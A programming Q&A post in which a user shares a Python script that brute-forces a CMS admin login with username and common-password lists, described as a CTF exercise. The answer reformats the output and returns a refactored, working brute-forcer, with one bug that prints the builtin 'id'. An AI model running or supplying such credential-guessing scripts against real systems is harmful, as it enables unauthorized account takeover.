I create a Web-Bruteforce project with Python for CTFs. I ran it.
As you can see something’s wrong. It isn’t regular. How can I print them more beautifully? These are my codes:
try: try: import requests except: print("You have to install "requests" via pip") header={"Cookie":"CMSSESSIDd6a5f2400115=uvtv1n19gois72a76vn4flje7u"} username = open("username.txt","r") username_content = username.read() username.close() password = open("common10k.txt","r") password_content = password.read() password.close() id=0 print("=====================================================================") print("ID Username Password Status_Code Length") print("=====================================================================") for u in username_content.splitlines(): for p in password_content.splitlines(): url = "http://10.10.255.177/simple/admin/login.php" data = {"username":f"{u}","password":f"{p}","submit":"Submit"} sonuc = requests.post(url=url,data=data,headers=header) id+=1 print(f"{id} {u} {p} {sonuc.status_code} {len(sonuc.content)}") except KeyboardInterrupt: print("Exiting...")
(These IP addresses and the cookie were for a CTF)
Advertisement
Answer
You can specify a size for the formatting and the content will be padded with spaces
# header print(f"{'ID':5s}{'Username':15s}{'Password':15s}{'Status_code':12s}{'Length':8s}") count = 0 for u in username_content.splitlines(): for p in password_content.splitlines(): url = "http://10.10.255.177/simple/admin/login.php" data = {"username": f"{u}", "password": f"{p}", "submit": "Submit"} sonuc = requests.post(url=url, data=data, headers=header) count += 1 print(f"{count:<5d}{u:15s}{p:15s}{sonuc.status_code:<12d}{len(sonuc.content):<8d}")
More
Do not use
id
builtin keywordRead file with a
with
, you don’t need to think about closing it sowith open("username.txt", "r") as username: username_content = username.read()
Or read it with
pathlib
from pathlib import Path username_content = Path("username.txt").read_text()
You can use
itertools.product
to use onefor-loop
for u, p in product(username_content.splitlines(), password_content.splitlines()):
Use
enumerate
to get thecount
auto-generatedfor idx, (u, p) in enumerate(product(username_content.splitlines(), password_content.splitlines())):
Final code
try: try: import requests from pathlib import Path from itertools import product except: print("You have to install "requests" via pip") url = "http://10.10.255.177/simple/admin/login.php" header = {"Cookie": "CMSSESSIDd6a5f2400115=uvtv1n19gois72a76vn4flje7u"} username_content = Path("username.txt").read_text().splitlines() password_content = Path("common10k.txt").read_text().splitlines() print("=" * 70) print(f"{'ID':5s}{'Username':15s}{'Password':15s}{'Status_code':12s}{'Length':8s}") print("=" * 70) for idx, (u, p) in enumerate(product(username_content, password_content)): data = {"username": f"{u}", "password": f"{p}", "submit": "Submit"} sonuc = requests.post(url=url, data=data, headers=header) print(f"{id:<5d}{u:15s}{p:15s}{sonuc.status_code:<12d}{len(sonuc.content):<8d}") except KeyboardInterrupt: print("Exiting...")